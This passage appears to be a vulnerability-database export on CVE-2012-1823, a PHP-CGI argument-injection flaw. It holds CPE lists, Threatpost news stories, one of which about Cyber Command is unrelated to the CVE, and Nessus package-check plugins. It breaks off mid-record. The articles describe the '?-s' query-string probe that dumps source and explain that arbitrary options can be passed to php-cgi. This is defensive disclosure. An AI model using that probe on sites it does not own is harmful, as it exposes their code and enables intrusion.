"cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311"], "description": "**UPDATE**\u2013The developers of PHP have released new versions of the scripting language to fix a [remotely exploitable vulnerability](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) announced earlier this week that enables an attacker to pass command-line arguments to the PHP binary. The flaw has been in the code for more than eight years and The PHP Group was working on a patch for it when the bug was disclosed accidentally on Reddit. However, the team that found the bug says the new versions of PHP don\u2019t actually fix the vulnerability. \n\nThe new versions of PHP are available now and the developers recommend that users upgrade as soon as possible. PHP versions 5.3.12 and 5.4.2 both contain the fix for the vulnerability. \n\n\u201cWe\u2019ve tested this and have confirmed that the query parameters are passed to the php5-cgi binary in this configuration. Since the wrapper script merely passes all the arguments on to the actual php-cgi binary, the same problem exists with configurations where php-cgi is directly copied into the cgi-bin directory. It\u2019s interesting to note that while slashes get added to any shell metacharacters we pass in the query string, spaces and dashes (\u2018-\u2019) are not escaped. So we can pass as many options to PHP as we want!\u201d the team that discovered the flaw, known as [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>), wrote in their analysis of the bug. \n\nEindbazen said in an updated post that the PHP patch isn\u2019t sufficient to fix the bug.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nThe PHP Group is working on a new fix for the vulnerability now.\n\n\u201cWe have received word that new PHP updates with the revised fix will be released soon. The issue that this problem was not properly fixed by the original security update is being tracked as CVE-2012-2311,\u201d Eindbazen said.\n\nThe PHP Group also had some other problems this week, specifically a problem in its internal bug-handling system that resulted in the private discussion on the CVE-2012-1823 vulnerability being marked as public. That led to the bug being posted to Reddit. The Eindbazen team then posted the details of the bug, which they had discovered in January during a capture the flag contest.\n\n\u201cThere is a vulnerability in certain CGI-based setups **(Apache+mod_php and nginx+php-fpm are not affected)** that has gone unnoticed for at least 8 years. [Section 7 of the CGI spec](<http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7>) states:\n\nSome systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed\u2019 query. This is identified by a \u201cGET\u201d or \u201cHEAD\u201d HTTP request with a URL search string not containing any unencoded \u201c=\u201d characters.\n\nSo, requests that do not have a \u201c=\u201d in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&amp;=1 is fine.\n\nA large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable,\u201d the [PHP Group](<http://www.php.net/archive/2012.php#id2012-05-03-1>) said in its release notes for the new versions. \u201cIf you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.\n\nThe PHP developers said that while the new versions of the language should work for most users, it may not be feasible for some users to update much older versions of PHP. In that case, users can deploy a workaround.\n\n\u201cAn alternative is to configure your web server to not let these types of requests with query strings starting with a \u201c-\u201d and not containing a \u201c=\u201d through. Adding a rule like this should not break any sites,\u201d they said.\n", "modified": "2013-04-17T16:32:18", "published": "2012-05-04T14:26:46", "id": "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "href": "https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/76524/", "type": "threatpost", "title": "PHP Group Releases New Versions, But Patch Doesn't Fix CVE-2012-1823 Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:06", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311", "CVE-2012-2329"], "description": "For the second time in less than a week, the developers of PHP have released new versions of the language that include a fix for the remotely exploitable vulnerability that was disclosed last week. The group is encouraging users to upgrade to PHP 5.4.3 or 5.3.13 immediately. \n\nThe [vulnerability affects PHP](<https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/>) sites in CGI-based setups and can enable an attacker to get access to the site\u2019s source code by passing certain queries to the PHP binary as command-line arguments. The bug was disclosed last week before a patch was available through a mistake in the PHP Group\u2019s internal bug-handling system.\n\n\u201cThe PHP development team would like to announce the immediate availability of PHP 5.4.3 and PHP 5.3.13. All users are encouraged to upgrade to PHP 5.4.3 or PHP 5.3.13\n\nThe releases complete a fix for a [vulnerability](<http://www.php.net/archive/2012.php#id2012-05-03-1>) in CGI-based setups (CVE-2012-2311). _Note: mod_php and php-fpm are not vulnerable to this attack,\u201d _the PHP developers said.\n\n\u201cPHP 5.4.3 fixes a buffer overflow vulnerability in the [apache_request_headers()](<http://php.net/manual/function.apache-request-headers.php>) (CVE-2012-2329). The PHP 5.3 series is not vulnerable to this issue.\u201d\n\nThe PHP Group [released a fix for the bug](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) late last week, but the researchers who discovered the flaw originally found that the new versions didn\u2019t completely address the problem and still left vulnerable sites exposed to attack. There are mitigations available for the bug, as explained by the [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>) team that found the flaw, but users should upgrade their installations as soon as they can.\n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T14:32:23", "id": "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "href": "https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/76544/", "type": "threatpost", "title": "Another Set of PHP Releases Pushed Out to Fix CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "[](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>)The PHP Group on Tuesday is planning to release another new version of the scripting language that\u2019s designed to address, again, the [remotely exploitable flaw](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) that came to light last week. That bug, which requires no authentication, was supposed to have been fixed in new releases pushed out on May 3, but they didn\u2019t completely address the problem.\n\nAfter The [PHP Group released new versions](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) of the language, the research team that initially discovered the flaw warned that the fixes didn\u2019t completely address the issue and still left sites vulnerable. The researchers, known as Eindbazen, discovered the vulnerability during a capture the flag competition earlier this year and were working with PHP developers and US-CERT on a fix. But the bug was disclosed accidentally when the PHP internal tracking system mistakenly marked the bug as public before a patch was ready.\n\nThe PHP Group on Friday released two new versions of the language, but Eindbazen said that they did not completely fix the problem.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nNow, the PHP developers are planning to push out another new release on Tuesday to hopefully fix the flaw.\n\n\u201cPHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use **$*** instead of **\u201c$@\u201d** to pass parameters to php-cgi which causes a number of issues. Again, people using mod_php or php-fpm are not affected,\u201d The PHP Group said.\n\n\u201cAnother set of releases are planned for Tuesday, May, 8th. These releases will fix the CGI flaw and another CGI-related issue in apache_request_header (5.4 only).\u201d\n\n \n\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T14:46:23", "id": "THREATPOST:4E1049C3C10581837DF71F684CB00683", "href": "https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/76537/", "type": "threatpost", "title": "PHP Group Set to Release Another Patch for CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:07", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "The U.S.\u2019s Cyber Command is using special, classified briefings with private sector CEOs to scare them into greater vigilance about the threat of cyber attacks, according to an NPR report.\n\nThe report, quoting unnamed participants in the classified, 2010 briefings said that government officials including Cyber Command Chief Gen. Keith Alexander and representatives from DoD, DHS and office of the Director of National Intelligence \u201cscared the bejeezus\u201d out of CEOs from leading technology firms like Dell and HP.\n\nThe briefings were part of a three year-old program dubbed the \u201cEnduring Security Framework\u201d that was designed to foster closer coordination between private sector executives and Washington. According to [the NPR report](<http://m.npr.org/news/front/152296621?page=3>), the executives are granted a temporary, one-day classified clearance and treated to a peak under the cover at some of the offensive cyber tools that are at the disposal of cyber warriors at the NSA, CIA and the Pentagon. The idea, according to public testimony by Alexander and Mike McConnell, the former U.S. director of national intelligence, is to show what the U.S.\u2019s cyber offensive capabilities are, with an eye to preparing private firms for what might be [leveraged against them by nation-backed attackers](<http://m.npr.org/news/front/152296621?page=2>).\n\nAmong the attacks highlighted by government officials was a firmware based attack that could \u201cbrick\u201d hardware by leading manufacturers, the sources told NPR.\n\nLegislation pending on Capitol Hill, including the recently defeated SOPA (Stop Online Piracy Act) and the [controversial Cyber Intelligence Sharing and Protection Act (CISPA)](<https://threatpost.com/cispa-passes-house-cacophony-groans-and-cheers-042712/>) provide new mechanisms for information sharing between the government and private entitites. However, privacy advocates such as the Center for Democracy and Technology have expressed consern about the bills\u2019 support for wide ranging, warrantless government surveillance of ordinary citizens. \n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T18:39:14", "id": "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "href": "https://threatpost.com/us-cyber-command-using-classified-intel-scare-ceos-action-050912/76545/", "type": "threatpost", "title": "U.S. Cyber Command Using Classified Intel To Scare CEOs To Action", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:59:10", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "Close to two years ago, a [serious vulnerability in PHP was accidentally disclosed](<http://threatpost.com/serious-remote-php-bug-accidentally-disclosed-050312/76517>) after it was discovered months prior during a hacking contest. A patch was released in relatively short order, and one would assume that given PHP\u2019s prevalence as a web development framework, the fix would have been applied just as quickly.\n\nBut given the discovery last October of a new set of exploits for [CVE-2012-1823](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>), that assumption may not be correct.\n\nResearchers at [Imperva ](<http://blog.imperva.com/2014/03/threat-advisory-php-cgi-at-your-command.html>)have been watching since Oct. 29 attacks exploiting the PHP bug. Attackers were using the new exploit to deliver arbitrary code to websites running PHP 5.4.x, 5.3.x before 5.4.2 or 5.3.12; those vulnerable versions account for about 16 percent of the sites on the web according to director of security research Barry Shteiman.\n\nThe new exploits were dangerous in that they allowed hackers to abuse an old vulnerability to not only run arbitrary code, but also adapt techniques found in botnets and crimeware kits to inject malware, steal credentials or system data from the server, or move laterally within the data center.\n\n\u201cNot only are we seeing a vulnerability used after it was released so long ago, but what we\u2019re seeing is attackers and professional hackers understanding what vendors understand\u2014people just don\u2019t patch,\u201d Shteiman said. \u201cThey can\u2019t or won\u2019t or are not minded to fix these problems.\u201d\n\nPHP is found on nearly 82 percent of websites today; these attacks target sites where PHP is running with CGI as an option, creating a condition that allows for code execution from the outside. Shteiman said the vulnerability affects a built-in mechanism in PHP that protects itself from exposing files and commands. A configuration flaw allows hackers to first disable the security mechanism, which in turn allows a hacker to run remote code or arbitrarily inject code.\n\n\u201cWith the new exploit, it\u2019s the same relative technique, but what we\u2019ve seen is a lot of automation,\u201d Shteiman said. \u201cThe tool that attacked these systems is running an interesting subset of dictionaries that requires an attacker know where PHP is installed on the server. We\u2019ve seen attackers trying different paths to see which backend contains the [PHP] executable.\u201d\n\nThe big-picture problem is the number of PHP websites still running vulnerable code despite the availability of a patch for close to two years now.\n\n\u201cPHP is installed as an interpreter,\u201d Shteiman said. \u201cReplacing the existing instance of PHP with a new one means downtime. Sometimes you may have to change applications because some things that are now deprecated may require application changes. For that reason, sometimes organizations don\u2019t patch or go a different route. They might use a new framework instead.\u201d\n\nOriginal reports on the vulnerability triggered advisories from a number of organizations, including US-CERT. The bug is a relatively simple one; researchers found that when they passed a specific query string that contained the -s command to PHP in a CGI setup, PHP would interpret the -s as the command line argument and result in the disclosure of the source code for the application. They extended their testing and found they could pass whatever command-line arguments they wanted to the PHP binary.\n\n\u201cYou\u2019d think these bugs would be long forgotten, but it isn\u2019t so; they\u2019re like the undead. Vulnerabilities never die,\u201d Shteiman said. \u201cThey don\u2019t die and we realize if we see this executed by botnets trying to onboard servers and by crimeware kits being sold, that means attackers understand they can rely on old problems because people won\u2019t fix them and attackers don\u2019t have to work too hard.\u201d\n", "modified": "2014-03-19T16:12:20", "published": "2014-03-19T12:12:20", "id": "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "href": "https://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881/", "type": "threatpost", "title": "Exploits for Two-Year-Old PHP Security Vulnerability Found", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7567.NASL", "href": "https://www.tenable.com/plugins/nessus/59265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59265);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n\n script_name(english:\"Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?330ef760\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081334.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a78f4509\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?978265c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"maniadrive-1.2-32.fc15.5\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-5.3.13-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-eaccelerator-0.9.6.1-9.fc15.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:24:54", "description": "when used in CGI mode remote attackers could inject command line\narguments to php", "edition": 22, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : php5 (openSUSE-SU-2012:0590-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-fileinfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "OPENSUSE-2012-261.NASL", "href": "https://www.tenable.com/plugins/nessus/74616", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-261.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74616);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-SU-2012:0590-1)\");\n script_summary(english:\"Check for the openSUSE-2012-261 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"when used in CGI mode remote attackers could inject command line\narguments to php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00006.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n 